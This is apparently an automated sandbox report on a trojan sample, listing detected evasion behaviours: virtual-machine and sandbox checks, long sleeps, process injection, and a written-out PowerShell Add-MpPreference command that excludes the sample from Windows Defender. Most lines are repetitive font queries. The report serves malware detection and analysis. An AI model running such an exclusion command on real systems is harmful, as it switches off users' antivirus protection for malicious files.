                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 3740, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 6284Thread sleep time: -40999s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 6756Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 660Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 7080Thread sleep count: 1412 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 7080Thread sleep count: 8427 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4268Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4297Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWindow / User API: threadDelayed 1412Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWindow / User API: threadDelayed 8427Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 0_2_00235FE1 sldt word ptr [eax]0_2_00235FE1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 40999Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C10040 LdrInitializeThunk,7_2_00C10040
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe base: 400000 value starts with: 4D5AJump to behavior
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeJump to behavior
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.936956122.00000000014D0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.936956122.00000000014D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.936956122.00000000014D0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.936956122.00000000014D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
